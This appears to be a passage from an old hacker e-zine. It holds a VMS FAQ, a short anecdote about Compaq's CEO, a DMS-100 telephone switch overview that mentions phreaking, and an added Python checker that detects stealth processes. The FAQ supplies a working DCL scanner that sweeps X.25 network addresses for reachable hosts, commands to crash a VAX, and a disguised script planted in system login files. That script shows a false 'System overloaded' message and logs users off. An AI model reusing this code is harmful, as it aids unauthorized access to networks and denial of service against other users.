You may also find of interest:

$ mc ncp show known networks
$ mc ncp show known lines
$ mc ncp show known destinations

[9]

" I need a NUA scanner for VMS. "

$ OPEN/READ VALUES SCAN.VAL
$ READ VALUES PRE
$ READ VALUES DTE
$ READ VALUES END
$ CLOSE VALUES
$ LOG = "SCAN.LIS"
$ TMP = "SCAN.TMP"
$ OPEN/WRITE FILE 'LOG
$ WRITE FILE "PREFIX:",PRE
$ WRITE FILE "START :",DTE
$ WRITE FILE "LAST :",END
$LOOP:
$ ON ERROR THEN GOTO OPEN
$ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE'
$ WAIT 00:00:06
$ SPAWN_NAME = F$GETJPI("","USERNAME")
$ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_"
$ CONTEXT = ""
$FIND_PROC:
$ PID = F$PID(CONTEXT)
$ IF PID .EQS. "" THEN GOTO OPEN
$ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID
$ GOTO FIND_PROC
$OPEN:
$ ON ERROR THEN GOTO OPEN
$ OPEN/READ PAD 'TMP
$ MSSG = " Process stopped"
$ ON ERROR THEN GOTO CLOSE
$ READ PAD LINE
$ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE
$ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE)
$CLOSE:
$ CLOSE PAD
$ DELETE 'TMP';*
$ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN
$ WRITE FILE PRE,DTE,MSSG
$NOCONN:
$ DTE = DTE + 1
$ IF DTE .LE. END THEN GOTO LOOP
$ CLOSE FILE

( I don't have a clue by whom the code was written. )

then

$ create scan.val
prefix
starting_NUA
ending_NUA
$ submit /noprint scan.com
.
.
.
$ search scan.lis "call connected"

[10]

" How do I crash a VAX !? "

$ set default sys$system
$ @shutdown

or

$ set default sys$system
$ run opccrash

[11]

" I have a dostogiefski.cld file; what do I do with it ? "

$ set command dostogiefski.cld

[12]

" Can I send messages to interactive processes ? "

$ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "

[13]

" How can I prevent someone from phoning me all the time ? "

$ set broadcast=(nophone)

[14]

" Can I postpone/disable interactive logins ? "

$ set logins /interactive=0

$ set logins /interactive

will display current value.
Under the same `logic' :

$ create innocent_filename.com
$ set nocontrol
$ context = ""
$ pid = F$PID(context)
$ user_name = F$GETJPI(pid,"username")
$ wait 00:01:00.00
$ write sys$output ""
$ write sys$output " System overloaded; please try again later "
$ write sys$output " Logging out process ''pid', of user ''user_name' "
$ write sys$output ""
$ logout /full

Add either to sys$system:sylogin.com or sys$login:login.com the following:
" $ @innocent_filename.com ".

[15]

" How can I modify the welcome file ? Where is it held ? "

$ set default sys$system
$ edit welcome.txt

[16]

" I am editing a huge text file. How can I reach the end of it ? "

at the editor's prompt type:

*find end

or

*find "search string"

[17]

" How can I be sure that no one is watching me from a hidden process ? "

$ show system /process

VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25
  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
.
.
.
00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47
00000117 SMTP_SYMBIONT   HIB      4    33398   0 00:16:49.67    246104    426
00000118 SYMBIONT_6      HIB      4    47868   0 00:05:09.01       296    121
00001255 SYMBIONT_0001   CUR 13  15    64293   0 00:05:08.12      1982    248

$ show system /full

VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43
  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
.
.
.
00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47
         [1,4]
00000117 SMTP_SYMBIONT   LEF      5    33407   0 00:16:49.78    246116    502
         [1,4]
00000118 SYMBIONT_6      HIB      5    47872   0 00:05:09.03       296    121
         [1,4]
00001255 SYMBIONT_0001   CUR 13  15    64348   0 00:05:09.60      2063    268
         [1,4]
$

See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4,
SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program
( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but
state, priority, physical memory used, page faults, input/output and Process
IDentification numbers, can reveal, in combination, such a nastiness.
Afterwards you may " show process /id=xxxx /continuous ", or
" stop /id=xxxx ".

[18]

" Can I view the CPU usage of each process ? "

$ monitor processes /topcpu

will display a bar-chart of this kind.

[19]

Run the following .COM file and it will display information you'd possibly
need on an account and/or node. It uses simple lexical functions.

$ output :== write sys$output
$ output ""
$ context = ""
$ node_id = F$CSID(context)
$ nodename = F$GETSYI("nodename",,node_id)
$ if F$GETSYI("cluster_member") .EQS. "TRUE"
$ then output " ''nodename' is a member of a cluster. "
$ else output " ''nodename' is not a member of a cluster. "
$ endif
$ context = ""
$ username = F$GETJPI("","username")
$ output " Username : ''username' "
$ group = F$GETJPI("","grp")
$ output " Group : ''group' "
$ uic = F$USER()
$ output " User Identification Code : ''uic' "
$ pid = F$PID(context)
$ output " Process IDentification : ''pid' "
$ process = F$PROCESS()
$ output " Process Name : ''process' "
$ terminal = F$GETJPI("","terminal")
$ output " Terminal Name : ''terminal' "
$ priority = F$GETJPI("","authpri")
$ output " Authorized Priority : ''priority' "
$ maxjobs = F$GETJPI("","maxjobs")
$ output " Maximum Number of Processes Allowed : ''maxjobs' "
$ authpriv = F$GETJPI("","authpriv")
$ output " Authorized Privileges : ''authpriv' "
$ curpriv = F$GETJPI("","curpriv")
$ output " Current Privileges : ''curpriv' "
$ directory = F$DIRECTORY()
$ output " Directory : ''directory' "
$ protection = F$ENVIRONMENT("protection")
$ output " Protection : ''protection' "
$ boottime = F$GETSYI("boottime")
$ output " Boot Time : ''boottime' "
$ time = F$TIME()
$ output " Current Time : ''time' "
$ version = F$GETSYI("version")
$ output " VMS version : ''version' "
$ output ""

You may :

$ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb

and then transfer lexicals.hlp.

[20]

" How can I view/modify my disk quota limit ? "

DiskQuota was a standalone utility in versions prior to five; it is now a
subset of the System Management utility, and thus you should :

$ set def sys$system
$ run sysman
SYSMAN> diskquota show /device=dua1: [1,1]
%SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --
Node
    UIC      Usage    Permanent Quota   Overdraft Limit
    [1,1]    123456   1500000           100

SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000

[END]

Post Scriptum

Some operations require privileges.

------------------------------------------------------------------------------

Compaq CEO blunders on TV

Compaq CEO Eckard Pfeiffer last week visited The Netherlands to do some pr
work. During a television interview for NOVA, a well known news show that
aired last Friday, Pfeiffer claimed that pc's were easy to use, and could be
used by virtually anyone. So, the reporter asked him to switch the tv
channel on a Presario that was next to Pfeiffer that ran a Windows-based TV
tuner. The result was Pfeiffer frantically clicking on several menu bars,
but instead of switching channels, he exited the program altogether. To make
things worse, the reporter next asked him to start up a word processor.
Again, Pfeiffer clicked his way around the desktop, but couldn't find nor
start the program. Finally, he was asked to start up a game. You saw
Pfeiffer (now in deep trouble) clicking on all the tabs of the "easy to use"
tab-works interface that is included on all Presario's, looking for games,
while muttering "Were are ze games? I can't find ze games on zis
machine!!!", his accent becoming increasingly more German than before. It
was almost like Dr. Strangelove.

The last shot is of a Compaq tech support guy, rushing in to help him
out.... So much for ease of use....

Voorburgwal 129, 1012 EP Amsterdam, The Netherlands).

------------------------------------------------------------------------------

Ok, I'm going to assume that you already know a little bit about what it is
you're reading.
The DMS100/IBN (integrated business network) is composed of mainly
electronic business sets, phones, data units, and attendant consoles and
units, all physically at the customer's place of business, while the digital
switching software and support hardware is located at the Telco. Together,
in tandem they work to give the customer one of the best combinations of
features and benefits. The DMS-100 combines voice AND data in one business
communications package. One of the many advantages is it offers the use with
*any* sized business with up to 30,000 lines.

The IBN system controls most operations, diagnoses problems, and also has
the ability to do limited repairs on itself. Being modular, it can meet the
needs at hand, and have the ability for new features, as time goes by, while
still maintaining a cost-effective environment. Another advantage is that it
uses a central attendant where and when needed. Along with Call Routing, or
CDR, to control and restrict Long Distance Calling, and network management.
The IBN gives the user hassle free operation.

Northern Telecom's DMS-100 switches, which by the way are digital, are
frequently backed-up by their *higher trained* personnel, which isn't saying
much. Some other features are: Automatic Routing Selection, or ARS, which
routes the long distance calls, if they are even allowed, over the most
economical (right) route available. Station Message Detail Recording, or
SMDR, which basically does just what its name states, records long distance
charges, including but not limited to, originating number, time and length
of call, authorization code, and others... Yet another capability is the
Direct Inward System Access (DISA), which gives the personnel the ability to
use the system to place long distance calls cheaply, even from outside the
company (sounds like a PBX a bit doesn't it?).

System Features and Benefits:

There are 6 Call Waiting Lamp Loop Keys, each with its associated source AND
destination lamp to signify the status of both the calling and the called
party status. The Second feature is Alpha Numeric Display Multiple Directory
Number Feature Keys, up to 42 of them, which can be used for a Paging
System, or speed dialing, and things along those lines. A third feature is
the release Source/Release Destination Console, which features access to
paging.

Other features which mainly are unimportant I will list here, they are:
Call Identifier Exclude Source/Exclude Destination. Remote Console Call
Destination. Signal Source. Signal Destination. Call Holding. Call Detail
Entry. Remote Console Call Selection. Console Display. Camp-on Automatic
Recall Conference. A 6 port 2 way splitting non-delayed operation. Busy
Verification of Lines. Manual and Automatic Hold. Multiple Console
Operation. Busy verification of trunks. Switched Loop Operation. Trunk Group
Busy Indication. Uniform Call distribution from queue. Multiple listed
directory numbers. Control of trunk group access. Secrecy. Night Service.
Serial call. Speed Calling. Lockout. Delayed Operation. Position Busy.
Interposition Calling. Through Call Pickup. Ring Again. Multiple Directory
Numbers. Intercom. Speed Call. Call Transfer/Conference. On-Hook Dialing.

Additional Programmable Features include automatic hold. Listen-on hold.
Multiple Appearance Directory Numbers, or MADN. Single Call Arrangement.
Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume
Control. Call Waiting. Stored Number Redial. Private Business Line. And
Finally a 32 character alphanumeric data unit.

The DMS100/IBN can be used as a "standalone" or can be attached to the
business set or other phone type unit. It has the ability to transmit over a
two wire loop, at speeds of up to 56 kb per second, using a proprietary time
compression multiplexing technology.
The DMS100 is also available in different models to suit existing terminal
capacities. It also provides integrated voice/data, that's right, data,
communications. They, the phone company, and data unit, can operate
together, simultaneously, or even independent of one another. Being fully
digitized, it was one of the first switches to eliminate the use of those
dinosaur analog modems (for which i still have a few if anyone wants to buy
em off me or give me shipping money and I'll send em to ya free).

Well that's it for now. This should give you a good understanding of the
capabilities of one of the many switches in use today. In fact, although
outdated somewhat, my telco, citizens utilities, and one in stockton from
what i just found out, is still using this switch (poor me in elk grove, ca
eh?) which makes phreaking quite an easy task, not that it was really ever
hard but anything to make it easier helps.

Anyway, if you have any comments/flames/general bullshit, mail it to either
jmatrix@mindvox.phantom.com or capthook@sekurity.com, the latter being a
last resort email address.

ciao
---Captain Hook

------------------------------------------------------------------------------
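
The cross-check described in item [17] of the VMS FAQ above, written out as an added Python example (not part of the original article or of VMS): it parses a captured "show system /full" listing and flags a process in a name family that differs from its peers on at least two of PID, priority and state. The family name, both thresholds and the two-signal rule are assumptions chosen for this illustration.

```python
import re
from statistics import median

# Copied from the `show system /full` listing in item [17] of the FAQ.
SHOW_SYSTEM_FULL = """\
00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 [1,4]
00000117 SMTP_SYMBIONT LEF 5 33407 0 00:16:49.78 246116 502 [1,4]
00000118 SYMBIONT_6 HIB 5 47872 0 00:05:09.03 296 121 [1,4]
00001255 SYMBIONT_0001 CUR 13 15 64348 0 00:05:09.60 2063 268 [1,4]
"""

# Scheduling state codes, used to find where the process name ends.
STATES = {"CEF", "COM", "COMO", "CUR", "COLPG", "FPG", "HIB", "HIBO",
          "LEF", "LEFO", "MWAIT", "PFW", "SUSP", "SUSPO"}
PID_GAP = 0x100  # assumption: peers started together have PIDs this close
PRI_GAP = 2      # assumption: tolerated distance from the peers' median priority


def parse_line(line):
    """Return one process row as a dict, or None for headers and filler."""
    tok = line.split()
    uic = tok.pop() if tok and tok[-1].startswith("[") else ""
    if len(tok) < 9 or not re.fullmatch(r"[0-9A-Fa-f]{8}", tok[0]):
        return None
    # The six rightmost fields are fixed, so read them from the right: an
    # extra token after the state (as on the CUR row) cannot shift columns.
    head, tail = tok[1:-6], tok[-6:]
    at = [i for i, t in enumerate(head) if i >= 1 and t in STATES]
    pri, io, days, clock, pflts, phmem = tail
    if not at or not all(t.isdigit() for t in (pri, io, days, pflts, phmem)):
        return None
    return {"pid": int(tok[0], 16), "name": " ".join(head[:at[-1]]),
            "state": " ".join(head[at[-1]:]), "pri": int(pri), "io": int(io),
            "cpu": f"{days} {clock}", "pflts": int(pflts),
            "phmem": int(phmem), "uic": uic}


def suspicious(listing, family="SYMBIONT", min_signals=2):
    """Flag family members that deviate from their peers on several fields."""
    rows = (parse_line(line) for line in listing.splitlines())
    procs = [p for p in rows if p and family in p["name"]]
    flagged = []
    for p in procs:
        peers = [q for q in procs if q is not p]
        if len(peers) < 2:
            continue  # too few peers to call anything an outlier
        signals = []
        if min(abs(p["pid"] - q["pid"]) for q in peers) > PID_GAP:
            signals.append("pid")
        if abs(p["pri"] - median(q["pri"] for q in peers)) > PRI_GAP:
            signals.append("priority")
        if p["state"].split()[0] not in {q["state"].split()[0] for q in peers}:
            signals.append("state")
        if len(signals) >= min_signals:
            flagged.append((p["name"], signals))
    return flagged


if __name__ == "__main__":
    for name, why in suspicious(SHOW_SYSTEM_FULL):
        print(f"{name}: differs from peers on {', '.join(why)}")
```

SMTP_SYMBIONT also differs from its peers on state alone (LEF against HIB), which is why a single deviating field is not treated as a finding.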